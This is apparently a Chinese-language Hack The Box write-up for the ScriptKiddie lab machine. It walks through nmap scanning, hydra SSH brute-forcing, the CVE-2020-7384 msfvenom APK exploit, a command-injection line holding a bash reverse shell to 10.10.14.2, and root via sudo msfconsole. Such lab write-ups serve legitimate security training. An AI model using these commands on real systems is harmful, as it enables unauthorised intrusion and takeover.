sudo vim /etc/hosts "10.10.10.226 scriptkiddie.htb"
sudo nmap -sS -Pn -p 1433,445,135,5985,3389,22,1521,3306,6379,5432,389,25,110,143,443,5900,21,873,27017,23,3690,1099,5984,5632,3389,80-100,7000-10000,13389,13306,11433,18080 -n --open --min-hostgroup 1024 --min-parallelism 1024 --host-timeout 30 -T4 -v scriptkiddie.htb
Warning: You specified a highly aggressive --min-hostgroup. Warning: Your --min-parallelism option is pretty high! This can hurt reliability. Starting Nmap 7.80 ( <https://nmap.org> ) at 2021-02-19 10:35 CST WARNING: Duplicate port number(s) specified. Are you alert enough to be using Nmap? Have some coffee or Jolt(tm). Initiating SYN Stealth Scan at 10:35 Scanning scriptkiddie.htb (10.10.10.226) [3050 ports] Discovered open port 22/tcp on 10.10.10.226 Completed SYN Stealth Scan at 10:35, 2.62s elapsed (3050 total ports) Nmap scan report for scriptkiddie.htb (10.10.10.226) Host is up (0.22s latency). Not shown: 2062 closed ports, 987 filtered ports Some closed ports may be reported as filtered due to --defeat-rst-ratelimit PORT STATE SERVICE 22/tcp open ssh Read data files from: /usr/bin/../share/nmap Nmap done: 1 IP address (1 host up) scanned in 2.73 seconds Raw packets sent: 5005 (220.220KB) | Rcvd: 2152 (86.084KB)
只有一個22端口,難道是要爆破嗎?
hydra -L /usr/share/wordlists/metasploit/unix_users.txt -P /usr/share/wordlists/metasploit/unix_passwords.txt -V -t 50 ssh://10.10.10.226:22
用hydea爆破了好久都沒有結果,應該不是爆破22端口,看來是nmap的掃描結果有問題,看來這個語句還是在追求nmap速度的時候才有一點點效果。
nmap -T4 -A scriptkiddie.htb
nmap -T4 -A scriptkiddie.htb Starting Nmap 7.80 ( <https://nmap.org> ) at 2021-02-19 10:45 CST Warning: 10.10.10.226 giving up on port because retransmission cap hit (6). Nmap scan report for scriptkiddie.htb (10.10.10.226) Host is up (0.21s latency). Not shown: 974 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0) 89/tcp filtered su-mit-tg 903/tcp filtered iss-console-mgr 1028/tcp filtered unknown 1065/tcp filtered syscomlan 1141/tcp filtered mxomss 1151/tcp filtered unizensus 1718/tcp filtered h323gatedisc 2008/tcp filtered conf 2009/tcp filtered news 2179/tcp filtered vmrdp 3333/tcp filtered dec-notes 5000/tcp open http Werkzeug httpd 0.16.1 (Python 3.8.5) |_http-title: k1d'5 h4ck3r t00l5 5051/tcp filtered ida-agent 5800/tcp filtered vnc-http 5907/tcp filtered unknown 6100/tcp filtered synchronet-db 7800/tcp filtered asr 8333/tcp filtered bitcoin 8402/tcp filtered abarsd 9290/tcp filtered unknown 16001/tcp filtered fmsascon 32770/tcp filtered sometimes-rpc3 32777/tcp filtered sometimes-rpc17 50636/tcp filtered unknown 52673/tcp filtered unknown Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 1 IP address (1 host up) scanned in 210.86 seconds
22端口已經爆破過了,看看http的5000端口。
看起來像是一個大馬工具箱一樣的東西,研究了半天還是沒搞懂要怎么利用,最后看了一眼別人的攻略,才知道關鍵點在payloads這個地方,但是要使android的一個反彈木馬是一個CVE的exp(CVE-2020-7384),下載好之后,添加到msfconsole當中,在metasploit-framework/modules/exploits路徑下面新建一個文件夾,將下載好的rd文件移動到新建的文件夾當中就好,本來是新建了一個rd文件然后把代碼復制進去的,但是打開msfconsole之后,使用了reload_all也沒有加載進來。
sudo msfconsole use exploit/newexploit/metasploit_msfvenom_apk_template_cmd_injection set lhost 10.10.14.2 set lport 4444 exploit [+]msf.apk stored at /root/.msf4/local/msf.apk
將生成的msf.apk移動到當前用戶目錄下面,方便使用。
sudo chmod 777 msf.apk
nc -lvnp 4444
給木馬賦予權限,使用nc監聽4444端口,就是反彈木馬連接的端口。
os選擇android,lhost填自己的IP地址,將msf.apk上傳,然后點擊generate,nc這邊就接收到shell了。接收到連接之后是沒有用戶標識符的,需要使用python3來重新進入到bashshell當中。
python3 -c "import pty;pty.spawn('/bin/bash')"
Getshell,讀取Userflag
用戶目錄共有兩個用戶一個kid一個pwn
查看了pwn文件當中的scanlosers.sh內容是5000端口當中nmap的調用文件,但是其中的lou參數標示了下一步怎么做。
當語句為真時執行nmap掃描的語句,當語句不為真是則返回輸出hackers當中的內容。
於是往hackers當中寫入木馬語句。
先將nc掛起,監聽4242端口
然后將下語句寫入,;前有兩個空格,一個空格執行之后連接不到nc
echo " ;/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.2/4242 0>&1' #" >> hackers
連接到nc之后,現在有了更高的權限,運行了scanlosers.sh,什么都沒有發生。??然后使用sudo -l
語句查詢一下有sudo語句運行權限。
sudo語句可以直接運行msfconsole
sudo msfconsole
擁有root權限,讀入root目錄下的 rootflag文件。